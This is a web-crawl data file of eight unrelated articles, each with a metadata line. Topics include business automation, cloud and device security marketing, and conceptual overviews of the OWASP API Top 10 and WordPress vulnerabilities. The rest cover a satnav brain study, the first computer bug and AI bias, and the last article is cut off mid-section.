Most companies have a line of business applications that most of their business runs out of. These applications usually have tools that can be utilized to streamline your processes and minimize costs due to manual errors.
- Exception reporting to find things that are not getting done on time or falling through the cracks
- Streamlining collections to automatically send out statements once accounts are X days overdue
- Automatically compiling timesheet data and importing/exported directly into payroll
Have you looked at your application lately to see if you are taking full advantage of its capabilities?
- Processes that keep you from scaling:
If you are addressing and stamping 1000 envelopes every month and that takes 2 full time resources to accomplish, it may be time to look into technology that can address and apply the postage automatically. Is emailing those same letters an option? If so, resources can then be allocated to quality control and other tasks in your organization that are more customer focused.
Scaling then becomes an efficiency of the automation that has been put into place.
- Error prone/Customer facing tasks:
Organizations with large campuses that are open to the general public usually have a staff member walk around, turn on the lights, TV’s, and other electronics to prepare for the day. In turn, that same staff member shuts everything down after hours. With the introduction of new IoT (Internet of Things) devices, you can automate this task. These devices can be scheduled to power on and off equipment at specific dates and times, usually saving energy and guaranteeing a repeatable experience for your customers.
What you decide to automate in your business is up to you. Some things maybe should never be automated, but there are always efficiencies to be gained by utilizing your existing or investing into newer technology. | <urn:uuid:790b3836-b82f-44f3-b1b0-05577346024b> | CC-MAIN-2022-40 | https://www.it360.biz/automation-in-business/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00494.warc.gz | en | 0.951288 | 672 | 2.75 | 3 |
There has been a significant increase in cyber attacks over the last several years as malicious actors look for, as well as exploit, vulnerabilities in computer systems and network infrastructure. When found, these vulnerabilities are used to compromise the network infrastructure, often with devastating financial consequences to the impacted business. Globally, businesses have lost more than $8 billion in 2018 as a result of ransomware, an increase from $5 billion in 2017 and $325 million in 2015. With ransomware attacks on businesses occurring every 14 seconds, it is projected that the costs of ransomware attacks will exceed $12 billion by 2020.
In order to avoid being a cyber attack casualty, businesses need to adopt cloud computing as part of their cyber-security strategy. With cloud computing, relevant data is no longer stored and maintained on local network infrastructure; third-party cloud service providers assume the responsibility for the storage and maintenance of data at virtual data centers. Businesses have better protection for their data when stored in the cloud rather than on local physical networks. Discussed below are some of the reasons why cloud computing is an essential cyber-security strategy for businesses.
1. Skilled Personnel
With online threats constantly evolving as well as the increasingly sophisticated nature of cyber attacks, it is essential to engage the services of cyber-security specialists well versed in the detection and neutralization of cyber attacks. At present, however, there is an insufficient number of experienced specialists available to meet the demand. As such, businesses may have difficulty finding cyber-security specialists to look after their network. With cloud computing, businesses no longer have to worry about finding cyber-security specialists. The cloud service provider assumes the responsibility for hiring specialists with the skill-sets necessary to deal with online threats.
2. Threat Recognition
Threat recognition and neutralization are essential in keeping networks protected. When detected early, measures can be implemented to quarantine and neutralize the threat before there is significant damage to the network. The longer a threat goes undetected, the greater the degree of network compromise and damage. In cloud-based networks, unlike traditional network infrastructures, threat analysis and network monitoring is done in real-time round the clock; this allows threats to be rapidly identified. This rapid identification of potential threats thereby significantly reduces the response time and minimizes risks to the network.
3. Data Backups
Frequent regular data backups are an essential component of any effective cyber-security strategy. Data backups provide redundancies for businesses such that they can resume business operations with minimal interruptions to their processes if they eventually fall victim to a cyber attack. Storage space limitations dictate how frequently and how much data can be backed up in traditional networks. With cloud computing, data storage can be scaled up as much as needed to handle the amount of data being backed up as well as the frequency.
4. Security Updates / Upgrades
Frequent regular security software updates and upgrades are necessary for businesses to remain secure from cyber attacks. Failure to do so may result in new threats not being promptly recognized until there has been a significant compromise to a business network. With cloud computing, updates and upgrades are performed frequently to ensure that cloud security remains constantly up to date; new security tools and applications are deployed as they become available. This is in contrast to traditional physical networks where there may be a delay in the deployment of security updates which can result in a decreased ability to identify and neutralize threats.
The Bottom Line:
At Cyber Sainik, we know how essential cloud computing is to any cyber-security strategy. We have a team of experts ready and willing to work with you to develop a cloud computing strategy to keep your business secure. Contact us today for more information. | <urn:uuid:b30d7cea-9593-4f46-abef-bd0071705224> | CC-MAIN-2022-40 | https://cybersainik.com/the-importance-of-cloud-computing-in-your-cybersecurity-strategy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00494.warc.gz | en | 0.948394 | 745 | 2.6875 | 3 |
If you’re looking towards the future to keep up-to-date with current tech trends, according to Microsoft research, by the end of this year up to 25% of corporate data will flow between mobile devices and the cloud.
Unfortunately, more information flow means more cyber attacks as the frequency increases the opportunities for hacking to occur. Otherwise, mobility is fantastic for business because it means employees can work on-the-go and aren’t limited by location or the typical 9-to-5 structure.
However, the downfall is that on-premise security is no longer applicable. Nowadays, security is essential for any business and Microsoft Surface devices are leading the pack by implementing the best encryption technology available.
THREATS TO SECURITY
First and foremost, security requires a preventative mindset so it’s important to be aware of the risks that exist in modern technology.
- Stolen devices that are secured with a predictable password and basic security features are easily accessed and can be very dangerous when they fall into the wrong hands.
- Malvertising includes deceitful web pages, email attachments and convincingly authentic advertisements. Clicking on one of these pages – accidental or not –can allow a hacker or cyber attack to gain unauthorized access to a device.
- Public Wi-Fi may seem like a great idea but can lead to man-in-the-middle attacks. A hacker or cyber attacker can intercept communication between the cloud and a device when it is connected to the same Wi-Fi network.
- User error includes transferring confidential information to unapproved locations, sharing important information over unsecured emails and installing risky apps. All of these actions can open up the device to various security threats.
SOLUTIONS TO SECURITY THREATS
The first step to solving security risks is being aware of the variety of issues that may arise. Next to increasing awareness of the potential threats, learning all of the best technological solutions available to prevent these threats is crucial.
- Dual-factor identification such as fingertip, facial or vocal recognition should be used on every device in addition to an alphanumeric password. This adds an extra layer of security and means that even if a device is stolen it will be nearly impossible to access the files on it.
- Hardware encryption means that the storage of data on your device is protected against disk cloning, boot disks or physical access. OneDrive is the built-in storage app on Surface devices. It backs up files and offers encryption to increase safety.
- Security compliance means ensuring your device meets the highest standards as decided by third-party boards. All Microsoft Surface devices are equipped with Windows Defender, a user-friendly program that protects against viruses, malware, spyware and more.
- Virtualization-based security creates a heavily controlled and specialized virtual space by combining software and hardware. This space can be used to store and transfer critical facts.
- Central management is a simple solution to monitor devices, report issues and support encrypted drives. This can be done within OneDrive or Windows Defender.
Ensure peace of mind with your Microsoft Surface device by being aware of security threats and the technology that can be used to combat them. Contact Microsoft today to gain information about the Surface’s mobility and security. | <urn:uuid:5bc96b33-c226-4c06-8b32-ce2453951696> | CC-MAIN-2022-40 | https://insights.ingrammicro.ca/blog/how-to-stay-secure-and-mobile-with-the-microsoft-surface | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00494.warc.gz | en | 0.919884 | 669 | 2.703125 | 3 |
Compared to traditional web applications, the modern development process is more dynamic, relies on a rapid delivery cycle, and follows a microservice framework. Such frameworks largely depend upon Application Programming Interfaces (APIs) as one of the most crucial components. Unfortunately, while APIs offer many benefits, they are common targets of attack vectors because of the API layer’s fundamental application vulnerabilities and security risks.
This article delves into the OWASP API Top 10 list and how attack vectors and best practices exploit a security vulnerability to avoid them.
What is the OWASP Top 10 List, and Why is It Important for Your Business?
The OWASP Web Application Security Project is a worldwide community focusing on protecting web applications and secure coding practices. OWASP regularly identifies and publishes the top 10 most critical web application security concerns along with their ranking and remediation guidance in an online document called OWASP Top 10.
Modern applications are built by coupling different programs packaged as microservices. The loosely-coupled nature of such applications has made Application Programming Interfaces (APIs) the backbone of modern web and mobile developments. Unfortunately, APIs for most web traffic in modern applications are also considered gatekeepers of applications’ data.
Because of inherent vulnerabilities, hackers leverage several attack mechanisms to exploit APIs and connected services to steal sensitive data. The persistent threat on APIs has led to the development of OWASP API Security Top 10 – a list of top 10 security concerns specific to web APIs. This list highlights the possible security vulnerabilities and provides solutions to understand and mitigate each vulnerability.
This post explores the OWASP API top 10 List for API security.
Risks of API Vulnerabilities
While APIs offer an efficient framework for connecting various software components, they typically expose backend data to third-party entities, making them prime targets of attack vectors. APIs are fundamentally designed to open and available application resources, making it more convenient for threat actors to leverage and inject malicious code.
Additionally, APIs are freely available and widely documented, offering easy learning for hackers to perform reconnaissance, gather configuration information, then orchestrate cybersecurity attacks. As insecure APIs slow innovation by expanding an application’s surface, organizations require unique approaches and strategies to implement API security.
OWASP Top 10 API Vulnerabilities
The top 10 most common vulnerabilities for API security include:
Broken Object Level Authorization
APIs rely on object-level authorization to validate resource access permissions for legitimate users. The API endpoint receives the requested object ID and then implements authorization checks at the code level to ensure the user has permission to perform the requested action. APIs typically expose the endpoints that provide identifiers for objects.
In the absence of object-level authorization checks or improper implementation, attackers can manipulate the requested object’s API endpoint and then fails to correctly validate that the user submitting the request has the required resource access privileges, granting them unauthorized access.
Broken User Authentication
By design, API endpoints must be exposed to external services and are accessed by various agents using user authentications. As a result, inadequate or improper authentication implementation at the API endpoint allows malicious users to temporarily compromise legitimate users’ authentication tokens to access sensitive information.
Broken authentication at the API endpoint can manifest in several issues. Some common misconfigurations that lead to broken authentication include:
- Insecure internal APIs
- Weak API keys with infrequent rotation
- API endpoints that use GET parameters to send sensitive information
- Invalid token access validation/missing validation for JWT access tokens
- Authorization flaws that make the endpoint susceptible to credential stuffing and brute-force attacks
- Weak/poorly managed passwords
APIs with broken user authentication allows malicious hackers to assume the identities of legitimate users, providing room for more profound, sophisticated attacks.
Excessive Data Exposure
APIs typically rely on client UIs filtering the data accessed when serving user requests. When a user requests to access a resource, the API returns the full data object stored in the application. The client application then filters the response to show only the information that the user wants to view.
Unfortunately, developers often mistake implementing APIs as generic data sources. This allows attackers to call the API directly to access the data that the client UI is supposed to filter out. Depending on the content or data exposed, attackers can carry out a breach or use the exposed data to gain elevated privileges.
Lack of Resource and Rate Limiting
Some APIs lack a default mechanism to limit the frequency and number of requests from a specific client. Hackers exploit this by crafting requests to upload/modify large files or make numerous requests to the API such that the API host is overwhelmed.
As a result, the API’s hardware can run out of memory, network bandwidth, and CPU and experience buffer overflow in such cases. This increases the API’s relapse time, reducing the number of clients the API can handle, often leading to a denial of service.
Mass assignment occurs when the API binds the client-provided data to the applications without appropriate filtering techniques. Developers use binding methods to fasten development cycles by using functions to bind user input with internal objects and code variables.
Attackers perform reconnaissance to assess the API structure and object relations, then explore mass assignment vulnerabilities to update and modify the properties of objects meant to be hidden. Once they have modified the properties of sensitive objects, attackers tend to escalate privileges, bypass security checks and tamper with sensitive data.
API resources, application infrastructure, and transport protocols may include misconfigurations that can facilitate security breaches. These misconfigurations can be within API resources, transport protocols, or application infrastructure. These include:
- Usage of default configuration with no or weak authentication
- No enforcement of HTTPS
- Unnecessary HTTP methods
- Misconfigured HTTP headers
- Data corruption through unsanitized inputs
- Data leakage
- Open cloud storage
- Verbose error messages
- Ad-hoc configurations
- Cross-origin source sharing.
An API endpoint generally consumes user data as request parameters or within its URL. Attackers can inject malicious inputs into the application when the API endpoints do not have any inbuilt mechanism to differentiate untrusted user data. Attackers can also supply these untrusted data as part of a command/query, tricking the application into executing them to gain access to sensitive data.
Lack of proper input data validation can result in injection attacks, including data leakage, privilege escalation, or denial of service. Common command injection flaws include SQL Injection with API parameters, OS commands injection, cross-site scripting, etc.
Improper Assets Management
With rapid delivery cycles characterizing the development of modern applications, DevOps teams frequently deploy more APIs into production, raising asset management issues. First, the desire for backward compatibility forces DevOps teams to leave old versions of APIs in operation.
Attackers commonly target such older versions to take advantage of outdated security checks. Other APIs may not conform to data governance policies, making them key entry points of data exposure.
Insufficient Logging & Monitoring
Most API attacks occur over a period of time, with the attacker performing reconnaissance, taking the time to explore vulnerabilities, and plan the right attack strategies. With the correct logging and monitoring mechanisms, developer teams can identify malicious actions as soon as they are initiated.
Unfortunately, most organizations implement proper logging for server and network events but commonly lack the mechanisms for adequate API-specific logging. A key reason for this is developers’ lack of insight into API usage.
As a result, developers miss to account events such as input validation failures, failed authentication checks, and other application errors that would indicate invalid access. In the absence of such alerts, attackers can stay undetected for extended periods, enabling them to exploit the system fully.
Best Practices for API Security
While there are inherent challenges and a continuously evolving threat landscape, organizations can embrace the right combination of best practices and security tools to maintain robust API security. Some best practices for securing APIs include:
Create and Update an API Inventory
To correctly manage and secure APIs, cross-functional teams should be aware of the number and identity of every API their organization owns and uses. Developers should also routinely discover and update API inventories by conducting perimeter scans. Furthermore, the operations team should share such inventory details to ensure the API assets are accounted for correctly.
Implement Strong Encryption Mechanisms
Data transfer between the API server and clients should be encrypted to prevent the interception of user requests and application responses. Strong encryption algorithms are considered one of the most robust methods to mitigate many attacks, such as man-in-the-middle or brute force attacks.
Use Quotas and Throttling to Limit Requests
Establishing quotas and setting thresholds help prevent denial-of-service attacks by limiting the number of requests a client can submit over a period of time. Throttling involves setting permissions to ascertain API calls. Then, through a triggered throttle, the system switches to a temporary state where the user remains logged into the system with a limited response rate.
Enforce Strong Authentication & Authorization Strategies
Use robust authentication mechanisms, such as multi-factor authentication, JWT access tokens, and the OAuth protocol to verify the identity of request origins. Developers should also use the principle of least privilege and role-based access control, among other proper authorization mechanisms, to manage permissions once a user is logged in.
API Scanner for Vulnerabilities
Security teams should consider a scanning solution that automatically discovers known vulnerabilities in applications to reduce the risk of being hacked through the API. The Crashtest Security Suite is a comprehensive API vulnerability scanning tool built to fit seamlessly into the DevOps toolchain, making it easier to integrate API vulnerability scanning into the development workflow. Create an account and get a free, 2-week trial to start scanning your APIs in minutes.
Check further information about the best practices for APIs here.
OWASP API Top 10 Security Video Explanation
What tests can I run to ensure secure APIs?
When creating security tests for APIs, developers should build random scenarios that address the OWASP top 10 vulnerabilities. Specific scenarios can be developed, including user authentication, parameter tampering, injection, unhandled HTTP methods, and Fuzz testing.
What are API security schemes?
API security schemes help developers implement robust, time-tested access control when building APIs. Popular supported schemes include API keys, basic authentication, and OpenID Connect (OIDC).
Which changes are expected for the future list?
The OWASP API Security list of top 10 vulnerabilities is constantly changing based on evolving trends of cyber attacks and development techniques. Therefore, the forthcoming list may contain combinations of current and newly identified vulnerabilities, with recent entrants including data integrity failures, insecure design, and cryptographic failures. | <urn:uuid:6403e5e7-a3f2-46ff-8d24-91cc2bee72c9> | CC-MAIN-2022-40 | https://crashtest-security.com/owasp-api-top-10/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00694.warc.gz | en | 0.876149 | 2,212 | 2.703125 | 3 |
The WordPress content management system (CMS) is popular with communities, e-commerce stores, educational websites, and blogs because of its flexibility and support for various use cases. The free, open-source CMS is also supported by advanced plugins that enable users to customize the look and feel of their websites.
Besides this, WordPress is supported by a global community of volunteers who develop plugins and themes, making it easy to learn, adapt and scale quickly.
While it is convenient and reliable for most website projects, WordPress requires strict observation of best practices to keep sites secure. In addition, since WordPress runs on open-source code, thousands of contributors take time to find, identify and fix WordPress security issues.
However, most often, tackling inherent challenges of a WordPress security issue a deep analysis, adoption of best practices, and embracing the right tools to mitigate risks.
This article delves into commonly found security issues with WordPress and the best methods to avoid them. Our blog can find further information about Web Security Basics for beginners.
WordPress Security Vulnerabilities and Risks
WordPress is widely popular, powering approximately 40% of global websites as of 2021. Even though the platform is built to be secure, security vulnerabilities are commonly found and arise due to users’ actions or site administrators’ malpractices. Since vulnerabilities typically exist in themes and plugins, securing a WordPress website often goes beyond securing the core WordPress source code.
Brute Force Attacks
Each WordPress site has a default login page (http://www.example.com/wp-admin) for administrator accounts. Attackers exploit this by trying to gain administrator privileges for the website. Considered one of the most common forms of WordPress attacks, brute force attacks are initiated by hackers trying to guess user credentials using sophisticated techniques and automation.
Since they do not rely on existing vulnerabilities, brute force attacks are one of the simplest ways to obtain user accounts and passwords. Some administrators use weak passwords that make it easy to program bots to help them obtain the user role.
In a successful, brute-force WordPress attack, attackers can steal user data, install malware, or erase a crucial application’s service. Even if they don’t successfully log in to the account, hackers carrying out brute force attacks can initiate denial-of-service by attempting thousands of simultaneous logins.
These attacks are also difficult to identify since the bots use different locations and IP addresses for login attempts, which allows them to persist without detection. While it is a trial and error method, a brute force attack is widely popular and was involved in over 80% of the attacks on WordPress websites in 2018.
In an XSS attack, hackers use existing WordPress vulnerabilities to inject malicious code into the website. These attacks mainly aim to steal another user’s identification information by hijacking their session and executing unwanted scripts on the client side.
In a typical XSS attack, a hacker utilizes a user input form to insert the malicious URL/string into the website’s database. When a victim requests a page from the site, the web server’s response includes the malicious script sent to the victim’s browser. When the browser executes this script, it sends the user’s session cookies to the hacker’s machine.
WordPress XSS vulnerabilities remain a critical challenge for web security teams since they are exploited differently, making them hard to identify and mitigate on time. For this purpose, there are various tools that you can use to detect XSS attacks and take action against them.
Various types of XSS vulnerabilities include:
- Stored cross-site scripting, also known as Persistent XSS, is the most alarming type of XSS that relies on malicious scripts to be permanently stored on the website’s database. This implies that whenever any user requests a site page, the malicious payload is sent to the user’s browser as part of the HTML response.
- Reflected cross-site scripting, also known as non-persistent XSS, involves a malicious script sent along with the user’s request. A successful attack typically requires the attacker to send the malicious script to each user separately. The script is then ‘reflected’ back such that the web server’s HTTP response includes the malicious payload sent as part of the request. In this case, attackers use ambush social engineering to deceive users into sending the malicious script to the webserver.
- In DOM-based XSS attacks, hackers inject malicious payloads if the website’s client-side scripts can write data provided by a Document Object Model (DOM). A common cause of this vulnerability is when developers do not include additional security measures to handle data correctly. Once injected, the malicious payload is executed when the webserver reads data back from the DOM.
File Inclusion Exploits
WordPress file inclusion exploits affect websites that utilize a scripting runtime, allowing hackers to upload files to the WordPress server, submit input into files or modify file permissions.
Attackers use a configuration file to enumerate the system, provide download functionality, and allow access for undefined user roles. In the absence of sufficient user input validation, attackers also use dynamic file inclusion capabilities to include a file on the server.
WordPress file inclusion exploits are categorized as:
- Local file inclusion (LFI) – These vulnerabilities enable hackers to include files on the server using their web browser. LFI exploits are easily performed on websites that accept files without properly sanitizing user input. An attacker can modify the input so that they inject special characters into the path and access other files hosted on the webserver. In most WordPress applications, successful LFI exploits occur due to insufficient validation of the Ajax path parameter when requesting the Ajax shortcode pattern.php script.
- Remote file inclusion (RFI) – Attackers leverage RFI vulnerabilities to include remote files on the webserver. These attacks are less common and are carried out on websites that dynamically include external scripts and files. If the application receives an arbitrary file through an unsanitized path, it creates an attack surface, leading to information theft, XSS attacks, and remote code execution attacks.
With the popularity of WordPress, there is a plethora of malicious software that disrupts how users interact with the website. Common variations of malware for WordPress websites include:
- Viruses – Software that replicates by injecting malicious code into other applications. Attackers use viruses to affect the website’s core functionality or add spam content that degrades the user experience.
- Trojan horse – Hackers use Trojan horses to perform a wide range of malicious actions for a WordPress website, including corrupting the wp-config.php file and FTP files and exploiting the system’s resources.
- Ransomware – Some attacks, like the WannaCry attack, make WordPress websites inaccessible until the hackers are paid to remove the malicious software. This can have catastrophic effects, including loss of revenue, tarnished reputation, and penalties from compliance authorities.
Other malware that compromised WordPress websites includes cryptocurrency mining bots, adware, and spyware.
The major security issue to be considered for WordPress sites
Attackers could use malicious SQL statements to compromise the database of WordPress websites, orchestrating SQL injection attacks. They inject SQL codes in stealth mode via the data accepted and transmitted from the website. This commonly involves using an input field to supply masked queries that contain special characters.
These characters are used by the SQL interpreter in the execution of external commands. Common entry points for WordPress SQLi attacks include feedback fields, search bars, shopping carts, logging-in forms, signing up, or contact submission.
The WordPress CMS uses SQL-based databases, making SQLi attacks a standard mode of exploitation. Since all the forums, blogs, and websites have input interfaces that accept user data, most WordPress sites have at least one known SQL injection point.
In addition, many available SQLi vulnerability scanning tools are online, making it easy for attackers to get started on the exploit. In successful SQLi attacks, the hackers gain complete control of the database, thereby leading to deeper penetration of the system and the exposure of sensitive data.
The importance to find WordPress Security issues for business
Almost anyone can contribute to the core WordPress software as an open-source platform. While this openness offers flexibility, it also raises concerns regarding the security of the platform’s overall construct.
Identifying and fixing vulnerabilities before they make it to production helps security teams avoid the expenses of recovering from a breach. Businesses also avoid the hefty penalties and fines compliance authorities charge for exposing private information.
Addressing WordPress security issues also helps protect the firm’s reputation since safeguarding customer data is known to maintain a competitive edge. Furthermore, administrators can operate websites without compromising business relationships with every additional security measure.
Protecting access credentials, and addressing WordPress vulnerabilities requires robust practices to prevent all platform layers, including the core WordPress functionality, external themes and plugins, and the underlying infrastructure.
Why have WordPress Sites vulnerabilities?
Various factors make WordPress websites susceptible to attack. These include:
Use of an outdated theme, plugin, or core
Using outdated versions increases the chance of successful exploits since version updates include fixes for known vulnerabilities in the code. WordPress rolls out new versions every three months, so it is important to check for the stable version update list to ensure the website’s components are up to date.
Use of common and weak passwords
The WordPress admin login is one of the most highly targeted threat vectors since it grants the highest possible privileges. Some WordPress users set up the admin portal with common passwords that are easy to guess and are naturally more susceptible to exploits.
In cases where the admin user ID is admin, it is easy to brute-force login into the system since bots go through fewer login attempts.
A compromised admin account makes it easy to orchestrate a data breach on the website and is the most commonly known first level of penetration for full-blown attacks.
WordPress plugins for security issues
WordPress security plugins help administrators manage the complex aspects of WordPress security and streamline security measures, compliance, and audit. Some popular security plugins for WordPress include:
iThemes Security plugin
iThemes is one of the most popular security plugins for WordPress websites as it offers multiple levels of security enhancements for robust threat management. The iThemes platform includes advanced controls such as multi-factor authentication, passwordless logins, and auto-administering strong password requirements to reduce the likelihood of a hack through a privileged account.
The platform also helps prevent automated brute-force logins by tracking login activity, then blocking the login screen in case of suspicious login attempts. The iThemes plugin also logs important security events for the WordPress website, highlighting unwanted changes to indicate a breach.
Sucuri is a cloud-based website security platform that helps protect WordPress sites from blacklists, malware, DDoS, and common attack vectors. With Sucuri, all website traffic is routed through the Sucuri cloud proxy Web Application Firewall (WAF) before going to the WordPress web server.
The firewall blocks all illegitimate requests and only lets in authenticated users. While Sucuri offers a free service, it also offers a pro version that offers advanced features such as:
- Real-time backup for all website changes
- One-click recovery
- Event and activity log
- Spam protection of all user input interfaces
- Email alerts for site unavailability
Wordfence is an open-source WordPress security plugin in two flavors; the basic version that offers basic protection and an enterprise version with advanced security controls.
The platform has an intuitive dashboard that makes it easy to visualize and navigate different security aspects. In addition, Wordfence offers comprehensive WordPress security management and includes functions such as:
- WordPress Firewall – a WAF built to detect and block malicious traffic
- WordPress Security Scanner – investigates the core code, themes, and plugins to identify any security issues
- Login Security – enables different authentication mechanisms while blocking admin logins through compromised passwords
- Security Tools – real-time traffic monitoring, IP and country blocking
Other ways to check for WordPress vulnerability
WordPress Security Scanner
WordPress security scanners are tools that help comprehensively evaluate the hosting environment, the web server, WordPress plugins, and themes to analyze any point of compromise.
While standard security plugins offer innovative mechanisms to alert and deter attacks in progress, a security scanner is mainly used proactively to prevent future attacks by identifying system-level vulnerabilities.
Some standard functions of a WordPress security scanner include:
- Use scripts to detect WordPress plugin versions, users, and themes
- Utilize theme and plugin enumeration to map the attack surface
- Fingerprint theme and plugin versions to pinpoint known vulnerabilities
- Enumerate website usernames
FAQs for WordPress security issues
Woocommerce security issues
Woocommerce is a WordPress plugin used to develop e-commerce sites. Given the sensitive nature of e-commerce transactions, security issues cannot be ignored on such sites. While Woocommerce offers off-the-shelf security and is considered a security platform, external threats such as brute force logins and hacking attacks are not uncommon.
Any Woocommerce store uses a typical login screen that attackers tend to access through brute-force logins. Though the platform is supported by a proactive development community that constantly adds enhancements and security patches, the changing threat landscape requires a focused approach to securing Woocommerce sites. Some best practices to secure Woocommerce sites include:
- Choosing a secure web host
- Leverage 2FA for admin logins
- Embracing a robust firewall mechanism
- Using the right security plugins
- Enforce policies for strong usernames and password
- Regular audit and full-stack scanning
- Regular backups
WordPress sites hacked
Due to its consistent popularity, the WordPress CMS remains a common target for attackers, with over 74% of website attacks performed on WordPress. Hackers exploit vulnerabilities across all layers and components of a stack, including the core platform, plugins, or themes. According to a recent report, about 75% of WordPress attacks were through third-party plugins, 14% were on the core functionality, and 11% were on outdated themes.
Some examples of successful WordPress attacks from the recent past include:
- Attack on the “File Manager” WordPress plugin
- The 1 million site breach of 2020
- The Responsive Menu breach
What is the best WordPress firewall plugin?
Firewall plugins (WAFs) help to filter all incoming traffic to your website. The most appropriate plugin differs for every use case; however, the right firewall platform must include a few basic features, such as:
- Intrusion detection
- Brute force prevention
- Blacklist removal services
- Malware detection and elimination
- DNS-level firewall | <urn:uuid:189f5a3f-9db3-4a31-835a-32b73b8a264b> | CC-MAIN-2022-40 | https://crashtest-security.com/wordpress-security-vulnerabilities/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00694.warc.gz | en | 0.888366 | 3,066 | 2.75 | 3 |
LONDON (Reuters) – If you have long feared that using a “satnav” navigation system to get to your destination is making you worse at finding the way alone, research now suggests you may be right. Scientists studying what satnavs do to the brain have found that people using them effectively switches off parts of the brain that would otherwise be utilized to simulate different routes and boost navigational skills.
Publishing the findings in the journal Nature Communications on Tuesday, the researchers said that when volunteers in an experiment navigated manually, their hippocampus and prefrontal cortex brain regions had spikes of activity. But these were not seen when the volunteers simply followed satnav instructions.
“When we have technology telling us which way to go … these parts of the brain simply don’t respond to the street network,” said Hugo Spiers of University College London’s (UCL) department of experimental psychology.
“In that sense our brain has switched off its interest in the streets around us.”
The researchers said constant use of satnavs would probably have longer-term limiting effects, making users less able to learn and navigate a city’s street network unaided.
“Understanding how the environment affects our brain is important,” said Amir-Homayoun Javadi, who worked on the UCL study before moving to the University of Kent. “Satnavs clearly have their uses and their limitations.”
As an extension of the research, the scientists also analysed the street networks of major cities around the world to visualise how easy they may be to navigate.
London, with its complex network of small streets, appears to be particularly taxing on the hippocampus, they said.
By contrast, far less mental effort may be needed to navigate Manhattan in New York, where a grid layout means that at most junctions the choice is only between straight, left or right.
(By Kate Kelland; Editing by Ed Osmond) | <urn:uuid:e2211f58-cd36-47cb-b398-b543097475c1> | CC-MAIN-2022-40 | https://disruptive.asia/satnavs-erasing-brains-ability-navigate/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00694.warc.gz | en | 0.943287 | 408 | 3.390625 | 3 |
Let’s talk a little bit about a behavior called transverse orientation. No, this isn’t a technology term or anything that you should be that familiar with, unless you buzz around at night in odd patterns.
Transverse orientation is how some insects navigate. They do this by flying at relative angles in relation to distant light sources.
Before electricity, these winged-pests would traverse the night’s sky using the light of the moon. It was simple—there was only one light source.
Today, however, these little buggers get understandably confused—which is why they fly into your house the moment you open your door, despite being uninvited.
Why am I talking so much about insects on a technology blog? So that we can better understand the origin of the technology term, bug—of course.
More specifically, did you know that the very first instance of a computer bug was recorded at 3:45 pm on September 9, 1947?
It was a moth, and it’s been preserved behind some adhesive tape for nearly 70 years.
That’s right, a moth—the very first computer bug!
Grace Hopper, a member of Harvard’s programming team working on the Mark II Aiken Relay Calculator, was working late at night with the windows opened (no screens). The moth—roughly four inches in wingspan—was attracted by the light of the room and heat of the calculator and nestled its way into the machine…where it was beaten to death by one of the relays.
Hopper’s team took the bug out of the relay, taped it to their logbook and labeled it as the “first actual case of a bug being found.”
While the term “bug” has been used before in regards to problems with machines / engineering, most famously by Thomas Edison, Hopper’s team popularized the terms “bug” and “debug” as part of the computer programming vernacular.
So the next time you encounter a bug while playing a game, or coding your next project, be glad you don’t have to pull out an actual dead moth from your computer (although that does sound easier, doesn’t it?). | <urn:uuid:1b610eff-aa88-4a1d-a7bf-8db24faf5971> | CC-MAIN-2022-40 | https://www.colocationamerica.com/blog/first-computer-bug | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00694.warc.gz | en | 0.957812 | 475 | 3.46875 | 3 |
Ready to learn Artificial Intelligence? Browse courses like Uncertain Knowledge and Reasoning in Artificial Intelligence developed by industry thought leaders and Experfy in Harvard Innovation Lab.
From facial recognition for unlocking our smartphones to speech recognition and intent analysis for voice assistance, artificial intelligence is all around us today. In the business world, AI is helping us uncover new insight from data and enhance decision-making.
For example, online retailers use AI to recommend new products to consumers based on past purchases. And, banks use conversational AI to interact with clients and enhance their customer experiences.
However, most of the AI in use now is “narrow AI,” meaning it is only capable of performing individual tasks. In contrast, general AI – which is not available yet – can replicate human thought and function, taking emotions and judgment into account.
General AI is still a way off so only time will tell how it will perform. In the meantime, narrow AI does a good job at executing tasks, but it comes with limitations, including the possibility of introducing biases.
AI bias may come from incomplete datasets or incorrect values. Bias may also emerge through interactions overtime, skewing the machine’s learning. Moreover, a sudden business change, such as a new law or business rule, or ineffective training algorithms can also cause bias. We need to understand how to recognize these biases, and design, implement and govern our AI applications in order to make sure the technology generates its desired business outcomes.
Recognize and evaluate bias – in data samples and training
One of the main drivers of bias is the lack of diversity in the data samples used to train an AI system. Sometimes the data is not readily available or it may not even exist, making it hard to address all potential use cases.
For instance, airlines routinely apply sensor data from in-flight aircraft engines through AI algorithms to predict needed maintenance and improve overall performance. But if the machine is trained with only data from flights over the Northern Hemisphere and then applied to a flight across sub-Saharan Africa, the conditions will provide inaccurate results. We need to evaluate the data used to train these systems and strive for well-rounded data samples.
Another driver of bias is incomplete training algorithms. For example, a chatbot designed to learn from conversations may be exposed to politically incorrect language. Unless trained not to, the chatbot may start using the same language with consumers, which Microsoft unfortunately learned in 2016 with its now-defunct Twitter bot, “Tay.” If a system is incomplete or skewed through learning like Tay, then teams have to adjust the use case and pivot as needed.
Rushed training can also lead to bias. We often get excited about introducing AI into our businesses so naturally want to start developing projects and see some quick wins.
However, early applications can quickly expand beyond their intended purpose. Given that current AI cannot cover the gamut of human thought and judgement, eliminating emerging biases becomes a necessary task. Therefore, people will continue to be important in AI applications. Only people have the domain knowledge – acquired industry, business, and customer knowledge – needed to evaluate the data for biases and train the models accordingly.
Diversify datasets and the teams working with AI
